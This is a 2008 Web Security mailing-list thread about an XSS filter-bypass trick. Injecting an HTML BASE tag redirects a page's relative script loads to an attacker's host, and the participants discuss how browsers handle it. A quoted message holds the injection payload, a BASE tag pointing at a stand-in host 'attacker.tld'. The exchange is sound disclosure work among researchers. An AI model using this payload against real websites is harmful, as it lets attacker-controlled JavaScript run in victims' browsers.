Re: [WEB SECURITY] Nice little XSS trick

[Amit Klein <aksecurity@xxxxxxxxx>]

Prasad Shenoy wrote:
> Definitely. Inserting <base> tag in <body> of an HTML document works
> in Firefox 2.0.0.15
>
>   

Indeed. My mistake. So the attack works in the body section, even with 
FF. Thanks for correcting me.

-Amit

> Thanks
> Prasad Shenoy
>
> On Tue, Jul 15, 2008 at 1:50 PM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
>   
> > Prasad Shenoy wrote:
> >     
> > > Amit -
> > >
> > > When you say observed by FF 2, I guess you mean this should not work
> > > in FF 2 correct? But it works with FF 2.
> > >
> > >       
> > When I tested it, FF 2 ignored BASE tags outside the HEAD section (if you
> > have information to the contrary, please share). That doesn't mean the
> > attack completely fails - it means that the injection point must be inside
> > the HEAD section (less common, but may still happen).
> >
> >     
> > > As this is a very simple example, I would like to believe that you are
> > > assuming that in order to invoke functions from the attacker
> > > controlled JS file (because there is no JS involved in the payload),
> > > the attacker would create a file with the same filename and function
> > > names as the one on the victim's domain. This way the actual (good) JS
> > > file will be overwritten by the attacker controlled JS and all the
> > > functions will be called from cross domain.
> > >
> > >       
> > Exactly.
> >
> > -Amit
> >
> >
> >     
> > > Valid?
> > >
> > > Thanks
> > > Prasad Shenoy
> > >
> > > Prasad Shenoy
> > > On Tue, Jul 15, 2008 at 7:33 AM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
> > >
> > >       
> > > > Hi list
> > > >
> > > > Recently I've been thinking about bypassing anti-XSS filters, and a nice
> > > > little trick occurred to me, which I haven't seen anywhere (e.g. it's not
> > > > on
> > > > RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
> > > > BASe, but not the trick I describe here). The idea is to use the HTML
> > > > BASE
> > > > tag to force loading of JS code from the attacker's host. Consider a page
> > > > with XSS vulnerability such as:
> > > >
> > > > <html>
> > > > ...
> > > > ***XSS code may be embedded here***
> > > > ...
> > > > <script src="/foo/bar.js"></script>
> > > > ...
> > > > </html>
> > > >
> > > > Now, an attacker can inject <base href="http://www.attacker.tld/";>, and
> > > > next
> > > > thing you know, the browser (IE, at least) loads the JS from
> > > > http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
> > > > "explicit" JS code involved in the payload itself.
> > > >
> > > > Note that according to the HTML standard, BASE should be placed in the
> > > > HEAD
> > > > section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This
> > > > is
> > > > indeed observed by FF 2, but not by IE (checked IE6).
> > > >
> > > > Thanks,
> > > > -Amit
> > > >
> > > >
> > > >
> > > > ----------------------------------------------------------------------------
> > > > Join us on IRC: irc.freenode.net #webappsec
> > > >
> > > > Have a question? Search The Web Security Mailing List Archives:
> > > > http://www.webappsec.org/lists/websecurity/archive/
> > > >
> > > > Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS
> > > > Feed]
> > > >
> > > > Join WASC on LinkedIn
> > > > http://www.linkedin.com/e/gis/83336/4B20E4374DBA
> > > >
> > > >
> > > >
> > > >         
> > >
> > >
> > >       
> >     
>
>
>
>   


----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA